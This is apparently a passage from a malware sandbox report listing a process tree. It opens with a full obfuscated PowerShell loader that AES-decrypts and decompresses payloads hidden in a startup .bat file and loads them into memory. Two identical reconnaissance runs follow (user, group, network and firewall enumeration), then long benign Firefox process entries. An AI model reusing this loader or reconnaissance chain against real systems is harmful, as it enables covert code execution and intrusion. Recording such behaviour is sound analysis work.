        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QkUW/Ic/Ytw2MngLixiwh7Ve+bqYu8nUO5hDHRQz4ig='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RlZ2esi6BcZ9nBYBMPpf/Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $mbADb=New-Object System.IO.MemoryStream(,$param_var); $eVlmz=New-Object System.IO.MemoryStream; $aYOFC=New-Object System.IO.Compression.GZipStream($mbADb, [IO.Compression.CompressionMode]::Decompress); $aYOFC.CopyTo($eVlmz); $aYOFC.Dispose(); $mbADb.Dispose(); $eVlmz.Dispose(); $eVlmz.ToArray();}function execute_function($param_var,$param2_var){ $moLPn=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $jIgXR=$moLPn.EntryPoint; $jIgXR.Invoke($null, $param2_var);}$SydOg = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_412.bat';$host.UI.RawUI.WindowTitle = $SydOg;$ixfQm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($SydOg).Split([Environment]::NewLine);foreach ($dBaqK in $ixfQm) { if ($dBaqK.StartsWith('ffMbuqHSEVphvzpRoaZs')) { $eNuZY=$dBaqK.Substring(20); break; }}$payloads_var=[string[]]$eNuZY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        6⤵
        
        PID:5708
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:5792
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe"
        7⤵
        
        PID:4448
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        8⤵
        Gathers system information
        
        PID:3308
        
        C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        8⤵
        
        PID:6240
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        8⤵
        Collects information from the system
        
        PID:6220
        
        C:\Windows\system32\net.exe
        
        net user
        8⤵
        
        PID:3152
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        9⤵
        
        PID:5968
        
        C:\Windows\system32\query.exe
        
        query user
        8⤵
        
        PID:2580
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        9⤵
        
        PID:896
        
        C:\Windows\system32\net.exe
        
        net localgroup
        8⤵
        
        PID:3076
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        9⤵
        
        PID:6468
        
        C:\Windows\system32\net.exe
        
        net localgroup administrators
        8⤵
        
        PID:6312
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        9⤵
        
        PID:6324
        
        C:\Windows\system32\net.exe
        
        net user guest
        8⤵
        
        PID:6392
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        9⤵
        
        PID:1520
        
        C:\Windows\system32\net.exe
        
        net user administrator
        8⤵
        
        PID:5048
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        9⤵
        
        PID:3580
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic startup get caption,command
        8⤵
        
        PID:224
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /svc
        8⤵
        Enumerates processes with tasklist
        
        PID:6436
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        8⤵
        Gathers network information
        
        PID:6452
        
        C:\Windows\system32\ROUTE.EXE
        
        route print
        8⤵
        
        PID:6972
        
        C:\Windows\system32\ARP.EXE
        
        arp -a
        8⤵
        
        PID:6416
        
        C:\Windows\system32\NETSTAT.EXE
        
        netstat -ano
        8⤵
        Gathers network information
        
        PID:7036
        
        C:\Windows\system32\sc.exe
        
        sc query type= service state= all
        8⤵
        Launches sc.exe
        
        PID:6964
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall show state
        8⤵
        Modifies Windows Firewall
        
        PID:6784
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall show config
        8⤵
        Modifies Windows Firewall
        
        PID:340
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe"
        7⤵
        
        PID:4196
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        8⤵
        Gathers system information
        
        PID:1604
        
        C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        8⤵
        
        PID:2392
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        8⤵
        Collects information from the system
        
        PID:1580
        
        C:\Windows\system32\net.exe
        
        net user
        8⤵
        
        PID:3576
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        9⤵
        
        PID:1792
        
        C:\Windows\system32\query.exe
        
        query user
        8⤵
        
        PID:4636
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        9⤵
        
        PID:6544
        
        C:\Windows\system32\net.exe
        
        net localgroup
        8⤵
        
        PID:5216
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        9⤵
        
        PID:5224
        
        C:\Windows\system32\net.exe
        
        net localgroup administrators
        8⤵
        
        PID:5292
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        9⤵
        
        PID:6560
        
        C:\Windows\system32\net.exe
        
        net user guest
        8⤵
        
        PID:5208
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        9⤵
        
        PID:2000
        
        C:\Windows\system32\net.exe
        
        net user administrator
        8⤵
        
        PID:1800
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        9⤵
        
        PID:4648
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic startup get caption,command
        8⤵
        
        PID:4752
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /svc
        8⤵
        Enumerates processes with tasklist
        
        PID:3068
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        8⤵
        Gathers network information
        
        PID:1552
        
        C:\Windows\system32\ROUTE.EXE
        
        route print
        8⤵
        
        PID:3272
        
        C:\Windows\system32\ARP.EXE
        
        arp -a
        8⤵
        
        PID:2360
        
        C:\Windows\system32\NETSTAT.EXE
        
        netstat -ano
        8⤵
        Gathers network information
        
        PID:3064
        
        C:\Windows\system32\sc.exe
        
        sc query type= service state= all
        8⤵
        Launches sc.exe
        
        PID:4460
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall show state
        8⤵
        Modifies Windows Firewall
        
        PID:3268
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall show config
        8⤵
        Modifies Windows Firewall
        
        PID:3280
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /0
  2⤵
  PID:5484
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:3064
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    PID:5684
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1912 -parentBuildID 20240401114208 -prefsHandle 1840 -prefMapHandle 1832 -prefsLen 25459 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e10eb5b3-ffa4-4f6c-89f2-fc582520f0db} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" gpu
      4⤵
      PID:5940
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2360 -parentBuildID 20240401114208 -prefsHandle 2352 -prefMapHandle 2348 -prefsLen 25495 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {929c2cc3-1ee6-4462-a65a-0575bf2bb4d3} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" socket
      4⤵
      PID:4148
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2708 -childID 1 -isForBrowser -prefsHandle 3040 -prefMapHandle 3036 -prefsLen 25636 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cecd1966-055f-4dbc-bff3-b91f3fe6c288} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:6804
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3480 -childID 2 -isForBrowser -prefsHandle 3880 -prefMapHandle 3876 -prefsLen 30869 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3039ead9-42f2-4817-b5ae-2f191fb9718e} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:4852
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4748 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4572 -prefMapHandle 4716 -prefsLen 30869 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dca75b4e-213a-4624-9400-0e945e6c670d} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" utility
      4⤵
      PID:256
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5320 -childID 3 -isForBrowser -prefsHandle 5344 -prefMapHandle 5328 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {371870fc-72cc-4997-a152-651cf567fed9} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:2636
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5532 -childID 4 -isForBrowser -prefsHandle 4752 -prefMapHandle 5244 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d300921a-6d18-4147-bf6b-48b754705ade} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:4556
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5660 -childID 5 -isForBrowser -prefsHandle 5736 -prefMapHandle 5732 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {301aaf42-4419-4084-89d4-90b99fa62cca} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:2392
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3612 -childID 6 -isForBrowser -prefsHandle 3496 -prefMapHandle 5296 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5dcd5e80-c626-4e25-9b93-ad24a9247062} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:1360
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5908 -childID 7 -isForBrowser -prefsHandle 5556 -prefMapHandle 5560 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {40db9360-1b52-439e-95f6-bd9569d26f54} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:2068
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6044 -childID 8 -isForBrowser -prefsHandle 6120 -prefMapHandle 6116 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3156fdea-f232-4ff8-8fad-e043e0b84d87} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:2812
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6240 -childID 9 -isForBrowser -prefsHandle 6316 -prefMapHandle 6312 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {567c4289-d9c0-4d33-945b-5a288e459834} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:1088
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6432 -childID 10 -isForBrowser -prefsHandle 6508 -prefMapHandle 6504 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {51869df0-2a33-4348-8c35-6ec36bd06a02} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:4648
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6408 -childID 11 -isForBrowser -prefsHandle 6652 -prefMapHandle 6660 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2a41b517-fc1e-4860-a5ab-7cc312abc40f} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:2932
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6880 -childID 12 -isForBrowser -prefsHandle 6800 -prefMapHandle 6804 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e7eba677-aacf-4e85-8caa-80cbff004118} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:2828
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7008 -childID 13 -isForBrowser -prefsHandle 7084 -prefMapHandle 7080 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a543ee2f-0a73-43c2-997d-f4a7e3688d6a} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:4680
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7180 -childID 14 -isForBrowser -prefsHandle 7188 -prefMapHandle 7192 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f54c5e6-025e-45da-b47b-d274ace46cae} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:5072
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7464 -childID 15 -isForBrowser -prefsHandle 7384 -prefMapHandle 7388 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {98c4b57f-a814-4ef9-a4cd-f6d4e2322222} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:2372
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7664 -childID 16 -isForBrowser -prefsHandle 7584 -prefMapHandle 7592 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e28b3531-51e4-4df9-8edb-dfe3cac339a4} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:5916
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7772 -childID 17 -isForBrowser -prefsHandle 7852 -prefMapHandle 7848 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0dca485f-3c77-455e-9fd7-4a7844c0fa11} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:5880
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8004 -childID 18 -isForBrowser -prefsHandle 7744 -prefMapHandle 7748 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {359390f8-cb81-4e87-9bc1-c0227a7611b9} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:3068
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8148 -childID 19 -isForBrowser -prefsHandle 8156 -prefMapHandle 8160 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5b0d1c8c-4fe4-45f2-968e-06231dbd6c2d} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:6900
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8436 -childID 20 -isForBrowser -prefsHandle 8356 -prefMapHandle 8364 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f60c9411-233e-4b6f-a28e-71df8a3ad42b} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:7164
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8620 -childID 21 -isForBrowser -prefsHandle 8540 -prefMapHandle 8544 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b6da2d47-9829-472c-b105-ef02aab0f231} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:1552
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8748 -childID 22 -isForBrowser -prefsHandle 8824 -prefMapHandle 8820 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1898d5bb-f9f7-4756-9576-6e45e68f00f3} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:4308
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8724 -childID 23 -isForBrowser -prefsHandle 8968 -prefMapHandle 8976 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {61d6e5cb-fc58-4202-a4e0-404234323740} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:2776
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8708 -childID 24 -isForBrowser -prefsHandle 9132 -prefMapHandle 9136 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ea1bde4b-4406-45cb-ae49-cd2d75d6db21} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:2948
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9304 -childID 25 -isForBrowser -prefsHandle 9312 -prefMapHandle 9316 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8991e19d-a478-4887-8534-397348b549f2} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:5480
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9496 -childID 26 -isForBrowser -prefsHandle 9504 -prefMapHandle 9508 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aff89548-f024-4322-bfa7-b4cc9380927f} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:5572
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9712 -childID 27 -isForBrowser -prefsHandle 9788 -prefMapHandle 9784 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dea23bc5-3690-4f5d-ab06-e8fc6c5cfeca} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:5388
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9692 -childID 28 -isForBrowser -prefsHandle 9920 -prefMapHandle 9924 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {151f8878-ed71-48f3-999c-4f01b26c9925} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:5800
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10100 -childID 29 -isForBrowser -prefsHandle 10056 -prefMapHandle 9672 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {07e5963b-af04-4e55-8393-f9889b93edd6} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:5256
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10268 -childID 30 -isForBrowser -prefsHandle 10276 -prefMapHandle 10280 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {da3a3517-7e04-4eda-863f-14736ccf44fc} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:6376
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10460 -childID 31 -isForBrowser -prefsHandle 10468 -prefMapHandle 10472 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {00c5c9e8-e4f2-4904-9e72-ae3c7e310105} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:4460
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10660 -childID 32 -isForBrowser -prefsHandle 10668 -prefMapHandle 10672 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {579ecc2f-6cb8-4fd9-b8c2-fb6e0eb4ca41} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:3468
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10844 -childID 33 -isForBrowser -prefsHandle 10852 -prefMapHandle 10856 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e827d493-f2b4-4a03-ae3d-e03569c63a6b} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:3552
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11036 -childID 34 -isForBrowser -prefsHandle 11044 -prefMapHandle 11048 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b6d3f7b-c2b0-45cb-b04e-f90068391962} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:1532
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11228 -childID 35 -isForBrowser -prefsHandle 11236 -prefMapHandle 11240 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c4e43318-b5dd-4c5c-8461-1e2e0bcb0a74} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:3592
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11424 -childID 36 -isForBrowser -prefsHandle 11432 -prefMapHandle 11436 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {79630c18-9dfa-45b6-a208-8ecd5cda67c9} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:1680
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11624 -childID 37 -isForBrowser -prefsHandle 11632 -prefMapHandle 11636 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {25e5f2b8-e21f-4838-991b-fd73bbc72906} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:3924
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11808 -childID 38 -isForBrowser -prefsHandle 11816 -prefMapHandle 11820 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d3707f1c-ff6f-4883-9568-8561dffc8f3a} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:5760
  - - C:\Program Files\Mozilla Firefox\firefox.exe
